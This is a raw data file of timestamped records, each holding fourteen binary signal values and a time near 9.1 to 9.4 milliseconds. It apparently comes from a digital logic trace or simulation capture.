1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1084600e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1084840e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1085080e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1085360e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1085640e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1085880e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1086120e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1086360e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1086600e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1086880e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1087120e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1087400e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1087640e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1087880e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1088120e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1088360e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1088600e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1088880e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1089120e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1089400e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1089640e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1089880e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1090120e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1090360e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1090600e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1090920e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1091160e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1091400e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,1,9.2335560e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,1,9.2337520e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,1,9.2337720e-03 0,1,1,0,1,0,0,0,0,0,0,1,0,1,9.2338000e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,1,9.2338280e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,1,9.2341160e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,1,9.2341400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,1,9.2341640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,1,9.2341880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,1,9.2342160e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,1,9.2342400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,1,9.2342680e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,1,9.2342920e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,1,9.2343160e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,1,9.2343400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,1,9.2343640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2343880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2344160e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2344400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2344680e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2344920e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2345160e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2345400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2345640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2345880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2346160e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2346400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2346680e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2346920e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2347160e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2347400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2347640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2347880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2348160e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2348400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2348680e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2348920e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2349160e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2349400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2349640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2349880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2350160e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2350400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2350680e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2350920e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2351160e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2351400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2351640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2351880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2352160e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2352400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2352680e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2352920e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2353160e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2353400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2353640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2353880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2354160e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2354400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2354680e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2354920e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2355160e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2355400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2355640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2355880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2356120e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2356360e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2356640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2356880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2357120e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2357400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2357640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2357880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2358120e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2358360e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2358640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2358880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2359120e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2359400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2359640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2359880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2360120e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2360360e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2360600e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2360880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2361120e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2361400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2361640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2361880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2362120e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2362360e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2362640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2362880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2363160e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2363400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2363640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2363880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2364120e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2364360e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2364640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2364880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2365120e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,9.2365400e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,9.2365640e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,9.2365880e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,9.2366120e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,9.2366360e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,9.2366600e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,9.2366880e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,9.2367120e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,9.2367400e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,9.2367640e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,9.2367880e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,9.2368120e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,9.2368360e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2368440e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2368640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2368880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2369160e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2369400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2369640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2369880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2370120e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2370360e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2370640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2370880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2371120e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2371400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2371640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2371880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2372120e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2372360e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2372600e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2372880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2373120e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2373400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2373640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2373880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2374120e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2374360e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2374640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2374880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2375160e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2375400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2375640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2375880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2376120e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2376360e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2376640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2376880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2377120e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2377400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2377640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2377880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2378120e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2378360e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2378600e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2378880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2379160e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,9.2379400e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,9.2379640e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,9.2379880e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,9.2380120e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,9.2380360e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,9.2380640e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,9.2380880e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,9.2381120e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,9.2381400e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,9.2381640e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,9.2381880e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,9.2382120e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,9.2382360e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2382440e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2382640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2382880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2383120e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2383400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2383640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2383880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2384120e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2384360e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2384600e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2384880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2385120e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2385400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2385640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2385880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2386120e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2386360e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2386640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2386880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2387160e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2387400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2387640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2387880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2388120e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2388360e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2388640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2388880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2389120e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2389400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2389640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2389880e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,9.2389920e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,9.2390120e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,9.2390360e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,9.2390600e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,9.2390880e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,9.2391160e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,9.2391400e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,9.2391640e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,9.2391880e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,9.2392120e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,9.2392360e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,9.2392640e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,9.2392880e-03 0,1,1,0,1,1,0,0,0,0,0,0,0,0,9.2392920e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2392960e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2393160e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2393400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2393640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2393880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2394120e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2394360e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2394680e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2394880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2395120e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2395400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2395640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2395880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2396120e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2396360e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2396680e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2396880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2397120e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2397400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2397640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2397880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2398120e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2398360e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2398600e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2398880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2399160e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2399400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2399640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2399880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2400120e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2400360e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2400600e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2400880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2401120e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2401400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2401640e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2401880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2402120e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2402360e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2402600e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2402880e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2403120e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2403400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2403880e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2404120e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2404360e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2404640e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2404880e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2405160e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,1,9.3654600e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,1,9.3656800e-03 1,1,1,0,1,0,0,0,0,0,0,1,0,1,9.3657000e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,1,9.3657240e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,1,9.3660040e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,1,9.3660280e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,1,9.3660520e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,1,9.3660760e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,1,9.3661000e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,1,9.3661240e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,1,9.3661480e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,1,9.3661800e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,1,9.3662000e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,1,9.3662280e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,1,9.3662520e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,1,9.3662760e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3662920e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3663000e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3663240e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3663520e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3663800e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3664000e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3664280e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3664520e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3664760e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3665000e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3665240e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3665480e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3665800e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3666000e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3666280e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3666520e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3666760e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3667000e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3667240e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3667480e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3667760e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3668000e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3668280e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3668520e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3668760e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3669000e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3669240e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3669480e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3669760e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3670000e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3670280e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3670520e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3670760e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3671000e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3671240e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3671480e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3671760e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3672000e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3672280e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3672520e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3672760e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3673240e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3673520e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3673760e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3674000e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3674520e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3674760e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3675240e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3675560e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3676080e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3676360e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3676840e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3677080e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3677560e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3677840e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3678360e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3678600e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3678840e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3679080e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3679320e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3679560e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3679840e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3680080e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3680360e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3680600e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3680840e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3681080e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3681320e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3681560e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3681840e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3682080e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3682360e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3682600e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3683080e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3683320e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3683560e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3683840e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3684080e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3684360e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3684600e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3684840e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3685080e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3685320e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3685560e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3685840e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3686080e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3686360e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3686600e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3686840e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3687080e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3687320e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3687560e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3687840e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3688080e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3688360e-03 